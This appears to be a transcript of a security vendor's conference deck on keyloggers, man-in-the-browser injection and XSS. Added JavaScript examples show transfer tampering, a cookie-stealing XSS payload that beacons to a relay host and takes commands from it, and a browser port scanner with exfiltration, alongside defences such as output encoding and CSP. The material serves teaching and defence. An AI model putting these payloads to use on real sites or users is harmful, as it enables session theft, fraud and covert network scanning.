Hijacking Web Servers & Clients: new generation threats and mitigation. Renaud Bidou, CTO; Mohammad Shams, Director, ME Operations.
DenyAll & RECRO-NET. French WAF vendor, pioneer since 2001, headquartered in Paris. More than 200 large clients all over the world, including 40% of the EuroStoxx 50 and 35% of the CAC 40. Partnerships with major players: RECRO-NET (Middle East, Central Europe), HP (Iberia, South America), British Telecom and Orange Business Services (Western Europe, North America, APAC). Recently listed as a prime European WAF player by Forrester in "Web Application Firewall: 2010 And Beyond", Chenxi Wang, February 2010.
DenyAll in France
DenyAll worldwide (map slide). Reference clients by region include: DIRF, SOCIETE GENERALE, EGE, CNSS; ANSI, ZITOUNA BANK, MINISTERE INTERIEUR; SH&Co; BNPP; ACCOR, AREVA; BNP PARIBAS INSURANCE; IP LIMITED; SOCIETE GENERALE LUX, EBRC, CACEIS; DANSKE BANK, KOPENHAGEN-FUR; AKTIA BANK; SENTOR, SVERIGE; TOYOTA BANK; SITEL FRIBOURG, BNP PARIBAS CH, TOTAL SA, SOCIETE GENERALE PB, STIHL, IWB; GROUPAMA, TDN, BT, IB SALUT, SATEC CANTABRIA, JUNTA DE EXTREMADURA; ARAG-IT, BASF-IT, ARAGO, UNIONINVEST, BROSE, BSH, ENDRESS-HAUSER, NETCONSULT, HELMICH, STADTWERKE, INVIK-BANK, JULIUS-BAR-BANK, MARKANT, BIT, TECHEM, THURINGER, ATOS WORLDLINE; BNP PARIBAS UK, ARVAL UK; LA POSTE, DZ BANK, PETERCAM; INPS; and others.
Threats Overview
Why application security? As cited in the deck: 75% of all attacks are directed at the web application layer; 2/3 of all web applications are vulnerable; in the first half of 2010, web application vulnerabilities reached 50 per cent of all reported code flaws. Most web site owners fail to scan effectively for the common flaws, and application patching is much slower than operating system patching.
Web Attacks: Targets & Impacts (matrix slide).
Targets: Client; Web Server; Database Server; Application Servers / Web Services.
Impacts plotted against those targets: Information Leak, Credentials Theft, Identity Theft, Authorization Abuses, Transaction Compromise, Defacement, Malware Planting, Session Hijacking, Denial of Service, Bounce, Password Guess, Remote Control, Data Theft, Data Corruption, Data Deletion, Persistent Injections, Processes Corruption, Data Interception (Remote Control and Denial of Service appear against more than one target).
Hijacking Servers & Clients: the same targets-and-impacts matrix, narrowed to the hijacking cases this talk covers, the client (keyloggers, browser compromise) and the server (cross-site scripting).
Threats: Keyloggers
What is a keylogger? A program that records every keystroke; the log can be stored in a file or sent over the network. Recent keyloggers add many more features: window names and field values, mouse activity reports, screenshots and video-like recordings. Because it operates on the compromised computer, keystrokes are captured before they are encrypted, so TLS is ineffective against it; no detection is possible from the server side, which receives a perfectly normal session; and applications can be seamlessly compromised.
Example: a simple keylogger. Really simple: about 100 lines including comments, based on the common Windows technique SetWindowsHookEx(WH_KEYBOARD_LL, ...). Public code at: http://batcheur.tuxfamily.org/?p=16. Really efficient: runs fine on Windows 7 (with UAC) and, at the time of the talk, ran undetected by anti-virus products.
Example: a simple keylogger (screenshot slide, no text content).
Threats: Browser Compromise
Code injection makes a process execute arbitrary code, and this process may be your browser. Most common techniques: SetWindowsHookEx (seen before, undetected); CreateRemoteThreadEx combined with LoadLibrary or WriteProcessMemory (the most basic technique, and the one that is detected and blocked); SetThreadContext, which relies on the DebugActiveProcess API (undetected, but requires debug rights). All of them are widely documented... and used.
Browser internals (Internet Explorer, as described in the deck). User-mode components, top to bottom:
IEXPLORE.EXE: the browser process, hosting Tab 1 to Tab n
BROWSEUI.DLL: IE user interface (bars, menus, etc.)
SHDOCVW.DLL: browser control (navigation, history), exposes the ActiveX interface
MSHTML.DLL: rendering
URLMON.DLL: MIME handling, code download, security
WININET.DLL: protocol handlers (HTTP and FTP)
USER32.DLL: Windows UI, handles the windowing components
KERNEL32.DLL: base API, calls into NTDLL
NTDLL.DLL: native API, entry to the OS user-mode components
About 200,000 function calls at IE launch: you cannot monitor everything.
Browser attack surface: the same component stack (WININET.DLL, URLMON.DLL, MSHTML.DLL, SHDOCVW.DLL, BROWSEUI.DLL, IEXPLORE.EXE, in every tab). Once code runs inside the browser process, hooking these modules lets it, roughly by layer, control navigation (SHDOCVW), control what is displayed (MSHTML), alter the security policy (URLMON) and communicate over the network (WININET).
An example. Legitimate action: bank client JV (account 5204320422040001) transfers $100 to bank client JM (account 5204320422040003). With malware injected into the browser, the page content is modified in transit and the funds are transferred to bank user JC (account 5204320422040005) instead.
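The tampering on this slide, as an added example that is not part of the deck: the bank page is modelled as plain data rather than a DOM so it runs under Node, and the field names, the /transfer path and the SMS confirmation channel are assumptions. The account numbers are the slide's. A real man-in-the-browser does this from inside the browser process, below TLS, so the bank receives a well-formed, authenticated request and cannot tell it apart; the example also shows the one check that survives, restating the destination over a channel the malware does not control.

```javascript
// Added illustration (not the deck's code) of the JV -> JM transfer being
// redirected to JC by code running inside the browser. Field names, the
// /transfer path and the SMS channel are assumptions; accounts are the slide's.

// The request the bank page builds from what the user typed.
function buildTransferRequest(form) {
  const body = new URLSearchParams({ from: form.from, to: form.to, amount: String(form.amount) });
  return { path: '/transfer', body: body.toString() };
}

// The bank's own summary of what it executed, sent over the assumed
// out-of-band channel (SMS), which the browser malware never touches.
function outOfBandSummary(executed) {
  return `Confirm: ${executed.amount} $ to account ${executed.to}`;
}

// The bank: a valid, authenticated request arrives, so it executes it, pushes
// the SMS, and echoes what it did. Nothing here can recognise a tampered request.
function serverHandleTransfer(body, phone) {
  const p = Object.fromEntries(new URLSearchParams(body));
  const executed = { from: p.from, to: p.to, amount: Number(p.amount) };
  phone.push(outOfBandSummary(executed));
  return { executed, confirmation: `Transferred ${p.amount} $ from ${p.from} to ${p.to}` };
}

// Man-in-the-browser: sees the request before TLS and the response after TLS.
// It swaps the destination on the way out and puts the expected one back into
// the text the user reads, so the page looks exactly as the user intended.
function manInTheBrowser(attackerAccount) {
  let originalTo = null;
  return {
    onRequest(req) {
      const p = new URLSearchParams(req.body);
      originalTo = p.get('to');
      p.set('to', attackerAccount);
      return { path: req.path, body: p.toString() };
    },
    onResponse(resp) {
      return { ...resp, confirmation: resp.confirmation.split(attackerAccount).join(originalTo) };
    },
  };
}

// The user compares the SMS with what they meant to do; a mismatch is the
// only signal that survives the compromised browser.
function userApproves(intendedForm, smsText) {
  return smsText.includes(intendedForm.to);
}

function runScenario(form, malware) {
  const phone = [];                                   // the SMS channel
  let req = buildTransferRequest(form);
  if (malware) req = malware.onRequest(req);
  let resp = serverHandleTransfer(req.body, phone);
  if (malware) resp = malware.onResponse(resp);
  const sms = phone[0];
  return { executed: resp.executed, shown: resp.confirmation, sms, approved: userApproves(form, sms) };
}
```

Running the scenario with and without `manInTheBrowser('5204320422040005')` shows the three views diverging: the bank executes a transfer to JC, the browser shows a transfer to JM, and only the SMS names JC. Everything the server can check (session, CSRF token, TLS) is intact, which is why MitB is a client-side problem that needs a second channel or transaction signing rather than a server-side filter.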
Demo slide (screenshot, no text content; titled "Example: a simple keylogger" in the deck).
Threats: Server Compromise
What is Cross-Site Scripting? Client-side code injection, a variant of HTML injection, based on JavaScript execution in the victim's browser. Two vectors: volatile (reflected) XSS, delivered through a malicious link; persistent (stored) XSS, where the malicious code is stored on the server and served to every visitor. An oldie but a goodie: in the wild for more than 10 years, and improved along with browser and JavaScript capabilities.
Impacts of XSS. Full control, through JavaScript, of the compromised page in the victim's browser, within what the same-origin policy lets that page do: cookie theft (unless the cookie is HttpOnly), information gathering on the client browser, redirection to an alternate, competing or malicious site, port scanning from the client, using the client as a proxy into its network, flash-mob DDoS. Exploitation of JavaScript capabilities: propagation through JavaScript-driven web transactions, dynamic/polymorphic code generation.
Dangers of XSS. Hard to detect: volatile XSS leaves nothing on the server but the request, so it can only be found through log file analysis; tracking persistent XSS gets harder with polymorphic code and the many advanced JavaScript obfuscation techniques. More and more powerful: complete control of remote browsers, networking operations (see CSRF), the next generation of botnets; considered the buffer overflow of the beginning of the 21st century. Unrecognized: most people think XSS is limited to cookie theft. Bang. You're dead.
101 XSS exploitation. The usual PoC injects <script>alert('XSS')</script>: a volatile and harmless XSS, used in most pentests, that generates a popup in the "compromised" browser.
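As an added example that is not from the deck, the two vectors defined above as a tiny search-and-comments page: the raw sinks that reflect or store the alert PoC, and the same renderers with HTML output encoding. The page layout, the /search path and the q parameter are assumptions.

```javascript
// Added example (not the deck's code): a reflected sink, a stored sink, and
// the hardened versions of both. Paths and parameter names are assumptions.

const PAYLOAD = "<script>alert('XSS')</script>";   // the PoC from the slide

// Volatile (reflected) XSS: the query parameter is echoed straight into HTML.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Persistent (stored) XSS: a comment is saved once and replayed to every visitor.
const comments = [];
function postComment(text) { comments.push(text); }
function renderCommentsVulnerable() {
  return comments.map(c => `<li>${c}</li>`).join('');
}

// HTML escaping for text nodes and double-quoted attribute values. Other
// contexts (inside a <script>, a URL, a CSS value) need their own encoder.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Same renderers, with every untrusted value encoded at the point of output.
function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}
function renderCommentsSafe() {
  return comments.map(c => `<li>${escapeHtml(c)}</li>`).join('');
}

// The malicious link for the volatile case: the payload travels in the URL
// and the vulnerable server echoes it back to whoever clicks.
function maliciousLink(goatBase) {
  return `${goatBase}/search?q=${encodeURIComponent(PAYLOAD)}`;
}

// What the server sees after parsing that link (URL is standard in Node).
function queryFromLink(link) {
  return new URL(link).searchParams.get('q');
}

// A crude check used only to make the difference visible: does the HTML still
// contain an executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

The hardened renderers do not try to detect or strip the payload; they encode every untrusted value for the context it lands in, which is the only approach that holds up against obfuscated variants of the same injection. A WAF in front of the site can add a second line of defence, but it cannot replace output encoding in the application.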
Real XSS exploitation method: a game with up to four players. The Hacker: the very bad guy. The Goat: the XSS-vulnerable website. The Victim: the innocent user whose browser will be compromised. The Relay: a compromised or malicious website (optional). Rules of the three-player game: the Hacker finds an XSS vulnerability on the Goat and exploits it, designing a script that will be executed on the Victim; the Victim reaches the compromised page on the Goat, either via a malicious link (volatile) or directly on the page (persistent); the script is executed by the Victim; the script may force a connection to the Relay to send back information.
Four-player game schema. 1. The Hacker compromises the Relay. 2. The Hacker exploits the XSS vulnerability on the Goat. 3. The Victim goes to the compromised page. 4. The malicious JavaScript is loaded into the Victim's browser. 5. The Victim executes the JavaScript. 6. The Victim sends information to the Relay. 7. The information is sent back to the Hacker. 8. The Relay sends new commands to the Victim.
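The exchange above as code for both parties, added here and not part of the deck: the Relay that collects reports and hands out commands, and the script the Hacker gets the Goat to serve into the Victim's browser. It is run in-process (no sockets, no DOM) so it works offline; the Relay paths /r and /c, the JSON shapes, the command set and the sample cookie are assumptions.

```javascript
// Added example (not the deck's code): steps 1 to 8 of the four-player game.
// Relay endpoints, message formats and sample values are assumptions.

// The Relay (steps 1, 7, 8): owned by the Hacker; the Victim only ever talks to it.
class Relay {
  constructor() { this.reports = []; this.queue = []; }
  enqueue(cmd) { this.queue.push(cmd); }          // the Hacker queues orders (step 8)
  handle(path, params) {
    if (path === '/r') {                            // step 6/7: a report from a victim
      this.reports.push(JSON.parse(Buffer.from(params.d, 'base64').toString('utf8')));
      return { ok: true };
    }
    if (path === '/c') {                            // step 8: next command, or idle
      return this.queue.shift() || { op: 'sleep', ms: 5000 };
    }
    return { error: 'unknown path' };
  }
}

// The payload injected through the XSS (steps 2, 4, 5). `env` stands in for
// the browser: cookie, URL, user agent, navigation and one request primitive.
// In a real payload the report goes out as `new Image().src = url` and the
// command comes back through an injected <script> tag or an XHR to the Relay.
function makePayload(env, relayBase) {
  const call = (path, obj) => {
    let url = relayBase + path;
    if (obj) url += '?d=' + encodeURIComponent(Buffer.from(JSON.stringify(obj)).toString('base64'));
    return env.request(url);
  };
  const handlers = {
    cookie:      () => call('/r', { kind: 'cookie', value: env.cookie, url: env.url }),
    fingerprint: () => call('/r', { kind: 'browser', ua: env.userAgent }),
    redirect:    (cmd) => { env.navigate(cmd.url); call('/r', { kind: 'redirected', url: cmd.url }); },
    sleep:       () => {},
  };
  return {
    run(rounds) {                                   // step 5 onward: check in, then keep asking
      const executed = [];
      call('/r', { kind: 'hello', url: env.url });
      for (let i = 0; i < rounds; i++) {
        const cmd = call('/c');
        if (handlers[cmd.op]) { handlers[cmd.op](cmd); executed.push(cmd.op); }
      }
      return executed;
    },
  };
}

// Wire both sides together in-process, playing the Victim's browser.
function simulate() {
  const relay = new Relay();
  relay.enqueue({ op: 'cookie' });
  relay.enqueue({ op: 'fingerprint' });
  relay.enqueue({ op: 'redirect', url: 'https://goat.example/login-lookalike' });
  const env = {
    cookie: 'SESSIONID=abc123',                     // constructed sample values
    url: 'https://goat.example/profile',
    userAgent: 'Mozilla/5.0 (constructed)',
    navigate(url) { env.url = url; },
    request(url) {
      const u = new URL(url);
      return relay.handle(u.pathname, Object.fromEntries(u.searchParams));
    },
  };
  const executed = makePayload(env, 'https://relay.example').run(4);
  return { relay, env, executed };
}
```

The point of the Relay is that the Goat's logs show nothing but a normal page view, the Victim's browser only ever contacts the Relay, and the Hacker only ever contacts the Relay, so neither the Goat nor the Victim can name the attacker. On the defensive side, the outbound beacon to a third-party host is the one thing a Content Security Policy (connect-src, img-src, script-src) or egress monitoring can still catch once the injection has happened.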
PoC: the XSS popup. Command sent to the client: alert("Gotcha")
Portscan. A JavaScript portscanner is loaded in an invisible iframe and the victim's browser performs the scan. The results are sent back through a request made from the invisible iframe and collected on the malicious server. The victim sees nothing, and the scanned host sees only connections from the victim's address, with no clue about the real attacker.
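An added example, not the deck's scanner, of how a page-level portscan turns browser probe results into a port list: the inference is kept separate from the browser-only collection so the decision logic can be exercised without a DOM, and the exfiltration request is built the way the slide describes, one GET from the hidden iframe. The timing thresholds, the relay URL and the sample results are assumptions. Two caveats a practitioner should keep in mind: browsers refuse connections to a built-in list of "bad" ports, and the timing signal is noisy, so the classification is probabilistic.

```javascript
// Added example (not from the deck): classify timing results from <img>
// probes and package the report for the relay. Thresholds are assumptions.

// One probe result: how the request to host:port ended and how long it took.
//  'load'    : the port answered with an image (rare, but unambiguous: open)
//  'error'   : fast means the TCP connect was refused (closed); slow means a
//              connection was accepted and then yielded no image (open)
//  'timeout' : nothing came back in time (open but silent, or filtered)
function classify(result, fastMs = 100) {
  if (result.outcome === 'load') return 'open';
  if (result.outcome === 'timeout') return 'open|filtered';
  return result.elapsedMs < fastMs ? 'closed' : 'open';
}

// Turn a list of probe results into the report the payload will send home.
function summarize(host, results, fastMs) {
  const report = {};
  for (const r of results) report[r.port] = classify(r, fastMs);
  const open = Object.keys(report).filter(p => report[p] === 'open').map(Number);
  return { host, report, open };
}

// The report leaves through a single GET from the hidden iframe, so the
// scanned host only ever saw the victim's address, never the attacker's.
function exfilUrl(relayBase, summary) {
  const q = new URLSearchParams({ h: summary.host, r: JSON.stringify(summary.report) });
  return `${relayBase}/scan?${q.toString()}`;
}

// Browser-only collection (needs a DOM; not exercised here): point an <img>
// at each port and time how the request ends.
function probe(host, port, timeoutMs) {
  return new Promise(resolve => {
    const t0 = Date.now();
    const img = new Image();
    const finish = outcome => resolve({ port, outcome, elapsedMs: Date.now() - t0 });
    const timer = setTimeout(() => { img.src = ''; finish('timeout'); }, timeoutMs);
    img.onload = () => { clearTimeout(timer); finish('load'); };
    img.onerror = () => { clearTimeout(timer); finish('error'); };
    img.src = `http://${host}:${port}/?${Date.now()}`;      // cache buster
  });
}
async function collect(host, ports, timeoutMs = 3000) {
  const results = [];
  for (const p of ports) results.push(await probe(host, p, timeoutMs));
  return results;
}
```

In a browser the payload would run `collect(host, ports)` and then set the iframe's location to `exfilUrl(relay, summarize(host, results))`. Because the probes originate from the victim's machine, they reach hosts behind the victim's firewall that the attacker could never address directly, which is what makes this more than a curiosity.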
Redirection. The victim is silently redirected to another web page: it could be a look-alike page, used to steal authentication credentials, or a competing site.
Thank you for your valuable time Q&A
(Distributor for Middle East & SE Europe ) 2702A Business Central Towers Dubai Internet City, PO. Box: 503012 Dubai,  United Arab Emirates Tel: 04-3754306 E-mail: middle-east@recro-net.com www.recro-net.com
